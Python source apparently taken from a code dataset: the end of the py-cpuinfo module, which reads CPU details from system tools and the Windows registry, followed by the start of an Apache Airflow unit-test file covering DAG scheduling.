Returns {} if lsprop is not found or ibm,pa-features does not have the desired info.
'''
try:
# Just return {} if there is no lsprop
if not DataSource.has_ibm_pa_features():
return {}
# If ibm,pa-features fails return {}
returncode, output = DataSource.ibm_pa_features()
if output == None or returncode != 0:
return {}
# Filter out invalid characters from output
value = output.split("ibm,pa-features")[1].lower()
value = [s for s in value if s in list('0123456789abcfed')]
value = ''.join(value)
# Get data converted to Uint32 chunks
left = int(value[0 : 8], 16)
right = int(value[8 : 16], 16)
# Get the CPU flags
flags = {
# Byte 0
'mmu' : _is_bit_set(left, 0),
'fpu' : _is_bit_set(left, 1),
'slb' : _is_bit_set(left, 2),
'run' : _is_bit_set(left, 3),
#'reserved' : _is_bit_set(left, 4),
'dabr' : _is_bit_set(left, 5),
'ne' : _is_bit_set(left, 6),
'wtr' : _is_bit_set(left, 7),
# Byte 1
'mcr' : _is_bit_set(left, 8),
'dsisr' : _is_bit_set(left, 9),
'lp' : _is_bit_set(left, 10),
'ri' : _is_bit_set(left, 11),
'dabrx' : _is_bit_set(left, 12),
'sprg3' : _is_bit_set(left, 13),
'rislb' : _is_bit_set(left, 14),
'pp' : _is_bit_set(left, 15),
# Byte 2
'vpm' : _is_bit_set(left, 16),
'dss_2.05' : _is_bit_set(left, 17),
#'reserved' : _is_bit_set(left, 18),
'dar' : _is_bit_set(left, 19),
#'reserved' : _is_bit_set(left, 20),
'ppr' : _is_bit_set(left, 21),
'dss_2.02' : _is_bit_set(left, 22),
'dss_2.06' : _is_bit_set(left, 23),
# Byte 3
'lsd_in_dscr' : _is_bit_set(left, 24),
'ugr_in_dscr' : _is_bit_set(left, 25),
#'reserved' : _is_bit_set(left, 26),
#'reserved' : _is_bit_set(left, 27),
#'reserved' : _is_bit_set(left, 28),
#'reserved' : _is_bit_set(left, 29),
#'reserved' : _is_bit_set(left, 30),
#'reserved' : _is_bit_set(left, 31),
# Byte 4
'sso_2.06' : _is_bit_set(right, 0),
#'reserved' : _is_bit_set(right, 1),
#'reserved' : _is_bit_set(right, 2),
#'reserved' : _is_bit_set(right, 3),
#'reserved' : _is_bit_set(right, 4),
#'reserved' : _is_bit_set(right, 5),
#'reserved' : _is_bit_set(right, 6),
#'reserved' : _is_bit_set(right, 7),
# Byte 5
'le' : _is_bit_set(right, 8),
'cfar' : _is_bit_set(right, 9),
'eb' : _is_bit_set(right, 10),
'lsq_2.07' : _is_bit_set(right, 11),
#'reserved' : _is_bit_set(right, 12),
#'reserved' : _is_bit_set(right, 13),
#'reserved' : _is_bit_set(right, 14),
#'reserved' : _is_bit_set(right, 15),
# Byte 6
'dss_2.07' : _is_bit_set(right, 16),
#'reserved' : _is_bit_set(right, 17),
#'reserved' : _is_bit_set(right, 18),
#'reserved' : _is_bit_set(right, 19),
#'reserved' : _is_bit_set(right, 20),
#'reserved' : _is_bit_set(right, 21),
#'reserved' : _is_bit_set(right, 22),
#'reserved' : _is_bit_set(right, 23),
# Byte 7
#'reserved' : _is_bit_set(right, 24),
#'reserved' : _is_bit_set(right, 25),
#'reserved' : _is_bit_set(right, 26),
#'reserved' : _is_bit_set(right, 27),
#'reserved' : _is_bit_set(right, 28),
#'reserved' : _is_bit_set(right, 29),
#'reserved' : _is_bit_set(right, 30),
#'reserved' : _is_bit_set(right, 31),
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
flags.sort()
info = {
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_cat_var_run_dmesg_boot():
'''
Returns the CPU info gathered from /var/run/dmesg.boot.
Returns {} if dmesg is not found or does not have the desired info.
'''
# Just return {} if there is no /var/run/dmesg.boot
if not DataSource.has_var_run_dmesg_boot():
return {}
# If dmesg.boot fails return {}
returncode, output = DataSource.cat_var_run_dmesg_boot()
if output == None or returncode != 0:
return {}
return _parse_dmesg_output(output)
def _get_cpu_info_from_sysctl():
'''
Returns the CPU info gathered from sysctl.
Returns {} if sysctl is not found.
'''
try:
# Just return {} if there is no sysctl
if not DataSource.has_sysctl():
return {}
# If sysctl fails return {}
returncode, output = DataSource.sysctl_machdep_cpu_hw_cpufrequency()
if output == None or returncode != 0:
return {}
# Various fields
vendor_id = _get_field(False, output, None, None, 'machdep.cpu.vendor')
processor_brand = _get_field(True, output, None, None, 'machdep.cpu.brand_string')
cache_size = _get_field(False, output, None, None, 'machdep.cpu.cache.size')
stepping = _get_field(False, output, int, 0, 'machdep.cpu.stepping')
model = _get_field(False, output, int, 0, 'machdep.cpu.model')
family = _get_field(False, output, int, 0, 'machdep.cpu.family')
# Flags
flags = _get_field(False, output, None, '', 'machdep.cpu.features').lower().split()
flags.extend(_get_field(False, output, None, '', 'machdep.cpu.leaf7_features').lower().split())
flags.extend(_get_field(False, output, None, '', 'machdep.cpu.extfeatures').lower().split())
flags.sort()
# Convert from GHz/MHz string to Hz
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
hz_actual = _get_field(False, output, None, None, 'hw.cpufrequency')
hz_actual = _to_decimal_string(hz_actual)
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, 0),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, 0),
'l2_cache_size' : _to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_sysinfo():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
info = _get_cpu_info_from_sysinfo_v1()
info.update(_get_cpu_info_from_sysinfo_v2())
return info
def _get_cpu_info_from_sysinfo_v1():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
try:
# Just return {} if there is no sysinfo
if not DataSource.has_sysinfo():
return {}
# If sysinfo fails return {}
returncode, output = DataSource.sysinfo_cpu()
if output == None or returncode != 0:
return {}
# Various fields
vendor_id = '' #_get_field(False, output, None, None, 'CPU #0: ')
processor_brand = output.split('CPU #0: "')[1].split('"\n')[0].strip()
cache_size = '' #_get_field(False, output, None, None, 'machdep.cpu.cache.size')
stepping = int(output.split(', stepping ')[1].split(',')[0].strip())
model = int(output.split(', model ')[1].split(',')[0].strip())
family = int(output.split(', family ')[1].split(',')[0].strip())
# Flags
flags = []
for line in output.split('\n'):
if line.startswith('\t\t'):
for flag in line.strip().lower().split():
flags.append(flag)
flags.sort()
# Convert from GHz/MHz string to Hz
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
hz_actual = hz_advertised
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, scale),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, scale),
'l2_cache_size' : _to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_sysinfo_v2():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
try:
# Just return {} if there is no sysinfo
if not DataSource.has_sysinfo():
return {}
# If sysinfo fails return {}
returncode, output = DataSource.sysinfo_cpu()
if output == None or returncode != 0:
return {}
# Various fields
vendor_id = '' #_get_field(False, output, None, None, 'CPU #0: ')
processor_brand = output.split('CPU #0: "')[1].split('"\n')[0].strip()
cache_size = '' #_get_field(False, output, None, None, 'machdep.cpu.cache.size')
signature = output.split('Signature:')[1].split('\n')[0].strip()
#
stepping = int(signature.split('stepping ')[1].split(',')[0].strip())
model = int(signature.split('model ')[1].split(',')[0].strip())
family = int(signature.split('family ')[1].split(',')[0].strip())
# Flags
def get_subsection_flags(output):
retval = []
for line in output.split('\n')[1:]:
if not line.startswith(' ') and not line.startswith(' '): break
for entry in line.strip().lower().split(' '):
retval.append(entry)
return retval
flags = get_subsection_flags(output.split('Features: ')[1]) + \
get_subsection_flags(output.split('Extended Features (0x00000001): ')[1]) + \
get_subsection_flags(output.split('Extended Features (0x80000001): ')[1])
flags.sort()
# Convert from GHz/MHz string to Hz
lines = [n for n in output.split('\n') if n]
raw_hz = lines[0].split('running at ')[1].strip().lower()
hz_advertised = raw_hz.rstrip('mhz').rstrip('ghz').strip()
hz_advertised = _to_decimal_string(hz_advertised)
hz_actual = hz_advertised
scale = 0
if raw_hz.endswith('mhz'):
scale = 6
elif raw_hz.endswith('ghz'):
scale = 9
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, scale),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, scale),
'l2_cache_size' : _to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_wmic():
'''
Returns the CPU info gathered from WMI.
Returns {} if not on Windows, or wmic is not installed.
'''
try:
# Just return {} if not Windows or there is no wmic
if not DataSource.is_windows or not DataSource.has_wmic():
return {}
returncode, output = DataSource.wmic_cpu()
if output == None or returncode != 0:
return {}
# Break the list into key values pairs
value = output.split("\n")
value = [s.rstrip().split('=') for s in value if '=' in s]
value = {k: v for k, v in value if v}
# Get the advertised MHz
processor_brand = value.get('Name')
hz_advertised, scale_advertised = _parse_cpu_brand_string(processor_brand)
# Get the actual MHz
hz_actual = value.get('CurrentClockSpeed')
scale_actual = 6
if hz_actual:
hz_actual = _to_decimal_string(hz_actual)
# Get cache sizes
l2_cache_size = value.get('L2CacheSize')
if l2_cache_size:
l2_cache_size = l2_cache_size + ' KB'
l3_cache_size = value.get('L3CacheSize')
if l3_cache_size:
l3_cache_size = l3_cache_size + ' KB'
# Get family, model, and stepping
family, model, stepping = '', '', ''
description = value.get('Description') or value.get('Caption')
entries = description.split(' ')
if 'Family' in entries and entries.index('Family') < len(entries)-1:
i = entries.index('Family')
family = int(entries[i + 1])
if 'Model' in entries and entries.index('Model') < len(entries)-1:
i = entries.index('Model')
model = int(entries[i + 1])
if 'Stepping' in entries and entries.index('Stepping') < len(entries)-1:
i = entries.index('Stepping')
stepping = int(entries[i + 1])
info = {
'vendor_id_raw' : value.get('Manufacturer'),
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale_advertised),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, scale_actual),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale_advertised),
'hz_actual' : _hz_short_to_full(hz_actual, scale_actual),
'l2_cache_size' : l2_cache_size,
'l3_cache_size' : l3_cache_size,
'stepping' : stepping,
'model' : model,
'family' : family,
}
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_registry():
'''
FIXME: Is missing many of the newer CPU flags like sse3
Returns the CPU info gathered from the Windows Registry.
Returns {} if not on Windows.
'''
try:
# Just return {} if not on Windows
if not DataSource.is_windows:
return {}
# Get the CPU name
processor_brand = DataSource.winreg_processor_brand().strip()
# Get the CPU vendor id
vendor_id = DataSource.winreg_vendor_id_raw()
# Get the CPU arch and bits
arch_string_raw = DataSource.winreg_arch_string_raw()
arch, bits = _parse_arch(arch_string_raw)
# Get the actual CPU Hz
hz_actual = DataSource.winreg_hz_actual()
hz_actual = _to_decimal_string(hz_actual)
# Get the advertised CPU Hz
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
# If advertised hz not found, use the actual hz
if hz_advertised == '0.0':
scale = 6
hz_advertised = _to_decimal_string(hz_actual)
# Get the CPU features
feature_bits = DataSource.winreg_feature_bits()
def is_set(bit):
mask = 0x80000000 >> bit
retval = mask & feature_bits > 0
return retval
# http://en.wikipedia.org/wiki/CPUID
# http://unix.stackexchange.com/questions/43539/what-do-the-flags-in-proc-cpuinfo-mean
# http://www.lohninger.com/helpcsuite/public_constants_cpuid.htm
flags = {
'fpu' : is_set(0), # Floating Point Unit
'vme' : is_set(1), # V86 Mode Extensions
'de' : is_set(2), # Debug Extensions - I/O breakpoints supported
'pse' : is_set(3), # Page Size Extensions (4 MB pages supported)
'tsc' : is_set(4), # Time Stamp Counter and RDTSC instruction are available
'msr' : is_set(5), # Model Specific Registers
'pae' : is_set(6), # Physical Address Extensions (36 bit address, 2MB pages)
'mce' : is_set(7), # Machine Check Exception supported
'cx8' : is_set(8), # Compare Exchange Eight Byte instruction available
'apic' : is_set(9), # Local APIC present (multiprocessor operation support)
'sepamd' : is_set(10), # Fast system calls (AMD only)
'sep' : is_set(11), # Fast system calls
'mtrr' : is_set(12), # Memory Type Range Registers
'pge' : is_set(13), # Page Global Enable
'mca' : is_set(14), # Machine Check Architecture
'cmov' : is_set(15), # Conditional MOVe instructions
'pat' : is_set(16), # Page Attribute Table
'pse36' : is_set(17), # 36 bit Page Size Extensions
'serial' : is_set(18), # Processor Serial Number
'clflush' : is_set(19), # Cache Flush
#'reserved1' : is_set(20), # reserved
'dts' : is_set(21), # Debug Trace Store
'acpi' : is_set(22), # ACPI support
'mmx' : is_set(23), # MultiMedia Extensions
'fxsr' : is_set(24), # FXSAVE and FXRSTOR instructions
'sse' : is_set(25), # SSE instructions
'sse2' : is_set(26), # SSE2 (WNI) instructions
'ss' : is_set(27), # self snoop
#'reserved2' : is_set(28), # reserved
'tm' : is_set(29), # Automatic clock control
'ia64' : is_set(30), # IA64 instructions
'3dnow' : is_set(31) # 3DNow! instructions available
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
flags.sort()
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, 6),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, 6),
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_kstat():
'''
Returns the CPU info gathered from isainfo and kstat.
Returns {} if isainfo or kstat are not found.
'''
try:
# Just return {} if there is no isainfo or kstat
if not DataSource.has_isainfo() or not DataSource.has_kstat():
return {}
# If isainfo fails return {}
returncode, flag_output = DataSource.isainfo_vb()
if flag_output == None or returncode != 0:
return {}
# If kstat fails return {}
returncode, kstat = DataSource.kstat_m_cpu_info()
if kstat == None or returncode != 0:
return {}
# Various fields
vendor_id = kstat.split('\tvendor_id ')[1].split('\n')[0].strip()
processor_brand = kstat.split('\tbrand ')[1].split('\n')[0].strip()
stepping = int(kstat.split('\tstepping ')[1].split('\n')[0].strip())
model = int(kstat.split('\tmodel ')[1].split('\n')[0].strip())
family = int(kstat.split('\tfamily ')[1].split('\n')[0].strip())
# Flags
flags = flag_output.strip().split('\n')[-1].strip().lower().split()
flags.sort()
# Convert from GHz/MHz string to Hz
scale = 6
hz_advertised = kstat.split('\tclock_MHz ')[1].split('\n')[0].strip()
hz_advertised = _to_decimal_string(hz_advertised)
# Convert from GHz/MHz string to Hz
hz_actual = kstat.split('\tcurrent_clock_Hz ')[1].split('\n')[0].strip()
hz_actual = _to_decimal_string(hz_actual)
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, 0),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, 0),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_platform_uname():
try:
uname = DataSource.uname_string_raw.split(',')[0]
family, model, stepping = (None, None, None)
entries = uname.split(' ')
if 'Family' in entries and entries.index('Family') < len(entries)-1:
i = entries.index('Family')
family = int(entries[i + 1])
if 'Model' in entries and entries.index('Model') < len(entries)-1:
i = entries.index('Model')
model = int(entries[i + 1])
if 'Stepping' in entries and entries.index('Stepping') < len(entries)-1:
i = entries.index('Stepping')
stepping = int(entries[i + 1])
info = {
'family' : family,
'model' : model,
'stepping' : stepping
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_internal():
'''
Returns the CPU info by using the best sources of information for your OS.
Returns {} if nothing is found.
'''
# Get the CPU arch and bits
arch, bits = _parse_arch(DataSource.arch_string_raw)
friendly_maxsize = { 2**31-1: '32 bit', 2**63-1: '64 bit' }.get(sys.maxsize) or 'unknown bits'
friendly_version = "{0}.{1}.{2}.{3}.{4}".format(*sys.version_info)
PYTHON_VERSION = "{0} ({1})".format(friendly_version, friendly_maxsize)
info = {
'python_version' : PYTHON_VERSION,
'cpuinfo_version' : CPUINFO_VERSION,
'cpuinfo_version_string' : CPUINFO_VERSION_STRING,
'arch' : arch,
'bits' : bits,
'count' : DataSource.cpu_count,
'arch_string_raw' : DataSource.arch_string_raw,
}
# Try the Windows wmic
_copy_new_fields(info, _get_cpu_info_from_wmic())
# Try the Windows registry
_copy_new_fields(info, _get_cpu_info_from_registry())
# Try /proc/cpuinfo
_copy_new_fields(info, _get_cpu_info_from_proc_cpuinfo())
# Try cpufreq-info
_copy_new_fields(info, _get_cpu_info_from_cpufreq_info())
# Try LSCPU
_copy_new_fields(info, _get_cpu_info_from_lscpu())
# Try sysctl
_copy_new_fields(info, _get_cpu_info_from_sysctl())
# Try kstat
_copy_new_fields(info, _get_cpu_info_from_kstat())
# Try dmesg
_copy_new_fields(info, _get_cpu_info_from_dmesg())
# Try /var/run/dmesg.boot
_copy_new_fields(info, _get_cpu_info_from_cat_var_run_dmesg_boot())
# Try lsprop ibm,pa-features
_copy_new_fields(info, _get_cpu_info_from_ibm_pa_features())
# Try sysinfo
_copy_new_fields(info, _get_cpu_info_from_sysinfo())
# Try querying the CPU cpuid register
_copy_new_fields(info, _get_cpu_info_from_cpuid())
# Try platform.uname
_copy_new_fields(info, _get_cpu_info_from_platform_uname())
return info
def get_cpu_info_json():
'''
Returns the CPU info by using the best sources of information for your OS.
Returns the result in a json string
'''
import json
output = None
# If running under pyinstaller, run normally
if getattr(sys, 'frozen', False):
info = _get_cpu_info_internal()
output = json.dumps(info)
output = "{0}".format(output)
# if not running under pyinstaller, run in another process.
# This is done because multiprocesing has a design flaw that
# causes non main programs to run multiple times on Windows.
else:
from subprocess import Popen, PIPE
command = [sys.executable, __file__, '--json']
p1 = Popen(command, stdout=PIPE, stderr=PIPE, stdin=PIPE)
output = p1.communicate()[0]
if p1.returncode != 0:
return "{}"
if not IS_PY2:
output = output.decode(encoding='UTF-8')
return output
def get_cpu_info():
'''
Returns the CPU info by using the best sources of information for your OS.
Returns the result in a dict
'''
import json
output = get_cpu_info_json()
# Convert JSON to Python with non unicode strings
output = json.loads(output, object_hook = _utf_to_str)
return output
def main():
from argparse import ArgumentParser
import json
# Parse args
parser = ArgumentParser(description='Gets CPU info with pure Python 2 & 3')
parser.add_argument('--json', action='store_true', help='Return the info in JSON format')
parser.add_argument('--version', action='store_true', help='Return the version of py-cpuinfo')
args = parser.parse_args()
try:
_check_arch()
except Exception as err:
sys.stderr.write(str(err) + "\n")
sys.exit(1)
info = _get_cpu_info_internal()
if not info:
sys.stderr.write("Failed to find cpu info\n")
sys.exit(1)
if args.json:
print(json.dumps(info))
elif args.version:
print(CPUINFO_VERSION_STRING)
else:
print('Python Version: {0}'.format(info.get('python_version', '')))
print('Cpuinfo Version: {0}'.format(info.get('cpuinfo_version_string', '')))
print('Vendor ID Raw: {0}'.format(info.get('vendor_id_raw', '')))
print('Hardware Raw: {0}'.format(info.get('hardware_raw', '')))
print('Brand Raw: {0}'.format(info.get('brand_raw', '')))
print('Hz Advertised Friendly: {0}'.format(info.get('hz_advertised_friendly', '')))
print('Hz Actual Friendly: {0}'.format(info.get('hz_actual_friendly', '')))
print('Hz Advertised: {0}'.format(info.get('hz_advertised', '')))
print('Hz Actual: {0}'.format(info.get('hz_actual', '')))
print('Arch: {0}'.format(info.get('arch', '')))
print('Bits: {0}'.format(info.get('bits', '')))
print('Count: {0}'.format(info.get('count', '')))
print('Arch String Raw: {0}'.format(info.get('arch_string_raw', '')))
print('L1 Data Cache Size: {0}'.format(info.get('l1_data_cache_size', '')))
print('L1 Instruction Cache Size: {0}'.format(info.get('l1_instruction_cache_size', '')))
print('L2 Cache Size: {0}'.format(info.get('l2_cache_size', '')))
print('L2 Cache Line Size: {0}'.format(info.get('l2_cache_line_size', '')))
print('L2 Cache Associativity: {0}'.format(info.get('l2_cache_associativity', '')))
print('L3 Cache Size: {0}'.format(info.get('l3_cache_size', '')))
print('Stepping: {0}'.format(info.get('stepping', '')))
print('Model: {0}'.format(info.get('model', '')))
print('Family: {0}'.format(info.get('family', '')))
print('Processor Type: {0}'.format(info.get('processor_type', '')))
print('Extended Model: {0}'.format(info.get('extended_model', '')))
print('Extended Family: {0}'.format(info.get('extended_family', '')))
print('Flags: {0}'.format(', '.join(info.get('flags', ''))))
if __name__ == '__main__':
main()
else:
_check_arch()
|
core.py
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import json
import unittest
import bleach
import doctest
import mock
import multiprocessing
import os
import re
import signal
import sqlalchemy
import tempfile
import warnings
from datetime import timedelta
from dateutil.relativedelta import relativedelta
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from freezegun import freeze_time
from numpy.testing import assert_array_almost_equal
from six.moves.urllib.parse import urlencode
from time import sleep
from airflow import configuration
from airflow.executors import SequentialExecutor
from airflow.models import Variable
configuration.load_test_config()
from airflow import jobs, models, DAG, utils, macros, settings, exceptions
from airflow.models import BaseOperator
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dagrun_operator import TriggerDagRunOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.bin import cli
from airflow.www import app as application
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.timezone import datetime
from airflow.utils.state import State
from airflow.utils.dates import infer_time_unit, round_time, scale_time_units
from lxml import html
from airflow.exceptions import AirflowException
from airflow.configuration import AirflowConfigException, run_command
from jinja2.sandbox import SecurityError
from jinja2 import UndefinedError
import six
NUM_EXAMPLE_DAGS = 19
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
try:
import cPickle as pickle
except ImportError:
# Python 3
import pickle
def reset(dag_id=TEST_DAG_ID):
session = Session()
tis = session.query(models.TaskInstance).filter_by(dag_id=dag_id)
tis.delete()
session.commit()
session.close()
reset()
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super(OperatorSubclass, self).__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(*args, **kwargs):
pass
class CoreTest(unittest.TestCase):
# These defaults make the test faster to run
default_scheduler_args = {"file_process_interval": 0,
"processor_poll_interval": 0.5,
"num_runs": 1}
def setUp(self):
configuration.load_test_config()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_previous_runs')
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
Test scheduling a dag where there is a prior DagRun
which has the same run_id as the next run should have
"""
delta = timedelta(hours=1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous',
schedule_interval=delta,
start_date=DEFAULT_DATE)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
dag.create_dagrun(run_id=models.DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = scheduler.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
DEFAULT_DATE + delta,
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_once')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_start_end_dates',
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
# Create and schedule the dag runs
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_runs.append(scheduler.create_dag_run(dag))
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
@freeze_time('2016-01-01')
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
start_date of 2015-01-01, only jobs up to, but not including
2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
start_date = DEFAULT_DATE
runs = 365
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only',
start_date=start_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_run = scheduler.create_dag_run(dag)
dag_runs.append(dag_run)
# Mark the DagRun as complete
dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (for 2016-01-01)
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(configuration.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
class DAGsubclass(DAG):
pass
